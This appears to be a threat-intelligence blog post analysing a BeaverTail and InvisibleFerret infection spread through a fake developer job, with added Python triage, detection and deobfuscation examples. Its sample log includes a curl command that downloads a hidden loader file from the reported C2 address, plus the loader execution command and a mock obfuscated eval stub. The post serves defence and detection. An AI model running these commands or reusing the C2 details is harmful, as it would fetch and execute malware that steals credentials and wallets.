
BY eSentire Threat Response Unit (TRU)


November 14, 2024 | 13 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin


Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In October 2024, the eSentire Threat Response Unit (TRU) responded to an incident in which a software developer downloaded a JavaScript project that contained BeaverTail malware. Installing the project with the Node Package Manager (NPM) command executed malicious JavaScript files, which then deployed the InvisibleFerret malware to the host. InvisibleFerret was executed through a Python command, fingerprinted the host’s information and stole the credentials saved in the browser.

In response, our 24/7 SOC Cyber Analysts isolated the impacted host and alerted the customer with the relevant details.

Upon further investigation by eSentire’s TRU team, it was determined that the observed Tactics, Techniques, and Procedures (TTPs) were consistent with those reported for North Korean threat actors in the campaign tracked as Contagious Interview.

Initial Access

A ZIP file named ‘task-space-eshop-aeea6cc51a7c.zip’ was found in the user’s download directory. The eSentire Threat Intelligence team assesses it as probable that the victim downloaded the ZIP from a Bitbucket project named “eshop” (Figure 1).

Figure 1 eshop project hosted on Bitbucket.


The malicious “eshop” repository was committed by the user “francesco zaid” (Figure 2).

Figure 2 Author “francesco zaid” (screenshot taken October 24th, 2024).

The commits to eshop occurred roughly five days after a job posting for a freelancer was published on a freelance job board. The job was posted by a user named “francesco zaid” on www.freelancermap[.]com (Figure 3).

Figure 3 Possible Fake Job posting associated with the Contagious Interview Campaign.

It should be noted that the eSentire Threat Intelligence team reviewed the job posting and was unable to find a direct link from the posting to the eshop repository. However, the contact person’s name is the same name used to upload content to the repository, which is a notable finding and is consistent with the Contagious Interview campaign’s Tactics, Techniques and Procedures (TTPs) of luring software developers with fraudulent jobs.

The victim in the incident eSentire responded to appears to be a software developer, which aligns with the TTPs of previously reported campaigns by North Korean threat actors in which software developers were targeted.

Execution Chain

The ZIP file downloaded by the victim contained a malicious NPM package. Once installed by the victim, it executed the “server.js” file defined in “package.json”, which in turn loads a malicious JavaScript file (error.js) (Figure 4).

Figure 4 “server.js” file was defined to be executed in the “package.json” file.

The “server.js” file is used as an entry point to load the file located at “backend/middlewares/helpers/error.js”, which carries out further malicious activity on the victim machine: stealing login credentials saved in browsers; collecting system information; enumerating crypto wallet extensions in the targeted browsers; and stealing configuration data from crypto wallets such as Exodus and Solana. This JavaScript file (error.js) is highly obfuscated, and after analysis it was determined to be a component of the BeaverTail malware (Figure 5).

Figure 5 Screenshot of ‘error.js’ found on the BitBucket Repository that is a component of BeaverTail.
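As an added illustration (not code from the original post or from the eshop repository), this Python triage script shows the kind of check a developer or analyst can run on an unpacked project before running npm install: it lists the entry point and lifecycle scripts from package.json and flags JavaScript files that show obfuscation indicators. The project layout, file contents and thresholds are constructed for the example.

```python
import json
import re
import tempfile
from pathlib import Path
# Constructed sample project (not the real "eshop" repository): package.json names
# server.js as entry point and install hook; server.js pulls in an obfuscated helper.
SAMPLE_FILES = {
    "package.json": json.dumps({"name": "eshop", "main": "server.js",
        "scripts": {"start": "node server.js", "postinstall": "node server.js"}}),
    "server.js": "require('./backend/middlewares/helpers/error.js');\n",
    "backend/middlewares/helpers/error.js":
        "var _0x1a=['\\x63\\x75\\x72\\x6c','\\x68\\x74\\x74\\x70'];"
        "eval(Buffer.from('" + "QUJD" * 200 + "','base64').toString());\n",
}
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def write_sample(root: Path) -> None:
    for rel, body in SAMPLE_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)

def obfuscation_indicators(text: str) -> list:
    """Cheap static signals that a JavaScript file is obfuscated."""
    reasons = []
    longest = max((len(line) for line in text.splitlines()), default=0)
    if longest > 500:
        reasons.append(f"line of {longest} chars")
    hex_escapes = len(re.findall(r"\\x[0-9a-fA-F]{2}", text))
    if hex_escapes >= 8:
        reasons.append(f"{hex_escapes} hex-escaped chars")
    if re.search(r"\beval\(|new Function\(|from\('[A-Za-z0-9+/=]{64,}', ?'base64'\)", text):
        reasons.append("dynamic evaluation / base64 blob")
    return reasons

def triage_project(root: Path) -> dict:
    """Report what runs automatically on install/start and which JS files look obfuscated."""
    pkg = json.loads((root / "package.json").read_text())
    scripts = pkg.get("scripts", {})
    report = {"entry": pkg.get("main"), "start": scripts.get("start"), "suspicious": {},
              "hooks": {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}}
    for js in sorted(root.rglob("*.js")):
        reasons = obfuscation_indicators(js.read_text(errors="ignore"))
        if reasons:
            report["suspicious"][js.relative_to(root).as_posix()] = reasons
    return report

def run_sample() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        write_sample(Path(tmp))
        return triage_project(Path(tmp))
```

Run `triage_project(Path("unpacked-project"))` on a real download; anything listed under hooks runs during npm install, before the developer has read a line of the code.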

After the JavaScript file is loaded, it uses a cURL command to download InvisibleFerret malware components from a command and control (C2) server; in this case the C2 was located at 185[.]235[.]241[.]208[:]1224. BeaverTail downloads the initial Python script of InvisibleFerret and saves it on the victim machine as a “.sysinfo” file in the victim’s home directory (Figure 6).

Figure 6 Initial BeaverTail Python Script that Fetches InvisibleFerret.

Once “.sysinfo” has been downloaded onto the machine, the InvisibleFerret loader is executed with the command “C:\Users\{username}\.pyp\python.exe” “C:\Users\{username}/.sysinfo”. It’s worth noting that this observation differs from what was reported by Unit 42, where the initial Python script was named “.npl”.
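The execution chain above leaves a distinctive process-creation pattern. The following is an added detection example, not from the original post: it scans constructed process events for node.exe spawning curl to write a hidden file into the user profile, and for python.exe under a .pyp directory running a dotfile script. The log format, user name and URL path are assumptions for the example; the C2 IP and port are the ones reported above.

```python
import re

# Constructed process-creation events (timestamp|parent image|image|command line),
# modelled on the chain described above; these are not real telemetry lines.
SAMPLE_EVENTS = r"""
2024-10-21T14:02:11|C:\Program Files\nodejs\node.exe|C:\Windows\System32\curl.exe|curl -L -o C:\Users\dev\.sysinfo http://185.235.241.208:1224/PLACEHOLDER_PATH
2024-10-21T14:02:13|C:\Program Files\nodejs\node.exe|C:\Users\dev\.pyp\python.exe|"C:\Users\dev\.pyp\python.exe" "C:\Users\dev/.sysinfo"
2024-10-21T14:05:40|C:\Windows\explorer.exe|C:\Windows\System32\curl.exe|curl -O https://example.org/README.md
2024-10-21T14:06:02|C:\Windows\explorer.exe|C:\Python312\python.exe|python manage.py runserver
""".strip().splitlines()

# A dot-prefixed file or directory directly under a user profile (either slash style).
HIDDEN_PROFILE_PATH = re.compile(r"[A-Za-z]:\\Users\\[^\\/\s\"]+[\\/]\.[A-Za-z0-9_]+", re.I)
URL_PORT = re.compile(r"https?://[^/\s:]+:(\d+)", re.I)
C2_PORT = "1224"  # port observed in this incident (185[.]235[.]241[.]208[:]1224)

def parse_event(line: str) -> dict:
    ts, parent, image, cmd = line.split("|", 3)
    return {"ts": ts, "parent": parent.lower(), "image": image.lower(), "cmd": cmd}

def classify(ev: dict) -> list:
    """Return the names of the rules an event matches (empty for benign events)."""
    hits = []
    if ev["parent"].endswith("\\node.exe") and ev["image"].endswith("\\curl.exe"):
        port = URL_PORT.search(ev["cmd"])
        if HIDDEN_PROFILE_PATH.search(ev["cmd"]) or (port and port.group(1) == C2_PORT):
            hits.append("node.exe spawned curl to fetch a hidden profile file (BeaverTail stager)")
    if "\\.pyp\\python.exe" in ev["image"] and HIDDEN_PROFILE_PATH.search(ev["cmd"]):
        hits.append("python.exe under .pyp ran a dotfile script (InvisibleFerret loader)")
    return hits

def scan(lines: list) -> list:
    """Map each matching event's timestamp to its rule hits."""
    return [(ev["ts"], hits) for ev in map(parse_event, lines) if (hits := classify(ev))]
```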

It’s also worth noting that a total of 21 crypto wallet extensions were targeted by BeaverTail in the sample we observed; the full list can be found in the Appendix at the end of the blog (Figure 7).

Figure 7 Crypto Wallet Browser Extensions Targeted by BeaverTail.

Analysis of InvisibleFerret Python Files

The eSentire Threat Intelligence team analyzed four Python files that were dropped in the incident: one loader (.sysinfo in this instance) and three payloads stored under the “\.n2” folder in the user’s home directory (Figure 8).

Table 1: Observed InvisibleFerret Python File Locations

Loader Component Overview

Figure 8 Python Loader (.sysinfo) Parameters (commented line was included).

It’s worth noting that the internal IP address (10.10.51.212) was excluded (commented out) in the initial loader script but still reappears in the various InvisibleFerret Python payloads (Figure 8). This suggests that the IP address may be used for testing purposes. Furthermore, our analysis revealed that excluded or commented-out code sections are a common trait of these scripts, potentially indicative of the malware’s development or testing stages.

The sample downloads three distinct payloads whose names are appended with a campaign ID and sub ID (sType and gType respectively, as seen in Figure 8 above and Figure 9 below): pay_campaignid_subid.py; brow_campaignid_subid.py; and mlip_campaignid_subid.py. On disk these files are saved to the %USERPROFILE%\.n2 path without these identifiers or file extensions (Figure 9).

Figure 9 InvisibleFerret Python Files.

Some of these files are obfuscated with a combination of zlib, base64 and reverse string order (Figure 10). The script loops through the lambda function continuously until the final cleartext payload is executed.
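As an added example (not the sample’s own code), the following Python decoder peels such zlib/base64/reversed layers statically: it builds a constructed multi-layer sample using the same transformation, then unwraps it without ever calling exec. The exact stub shape is an assumption; point the STUB pattern at a real sample’s stub before using it.

```python
import base64
import re
import zlib

# Assumed stub shape for this example (constructed, not copied from the sample):
#   _ = lambda __: __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
#   exec((_)(b'<reversed base64 of the zlib-compressed next layer>'))
STUB = re.compile(rb"exec\(\(_\)\(b'([A-Za-z0-9+/=]+)'\)\)")
CLEARTEXT = b"import platform\nprint(platform.node())\n"  # constructed final payload

def wrap(payload: bytes, layers: int) -> bytes:
    """Build a layered test sample: zlib-compress, base64-encode, reverse, repeat."""
    data = payload
    for _ in range(layers):
        blob = base64.b64encode(zlib.compress(data))[::-1]
        data = (b"_ = lambda __: __import__('zlib').decompress("
                b"__import__('base64').b64decode(__[::-1]))\n"
                b"exec((_)(b'" + blob + b"'))\n")
    return data

def unwrap(data: bytes, max_layers: int = 64) -> tuple:
    """Statically peel layers until no exec stub remains. Nothing is executed:
    each layer is reversed, base64-decoded and zlib-decompressed in place of
    the exec() call, and the cleartext plus the layer count are returned."""
    layers = 0
    while layers < max_layers:
        m = STUB.search(data)
        if m is None:
            return data, layers
        try:
            data = zlib.decompress(base64.b64decode(m.group(1)[::-1]))
        except (ValueError, zlib.error) as exc:
            raise ValueError(f"layer {layers + 1} did not decode: {exc}") from exc
        layers += 1
    raise ValueError(f"gave up after {max_layers} layers")
```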

eSentire Threat Response Unit (TRU) 

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.
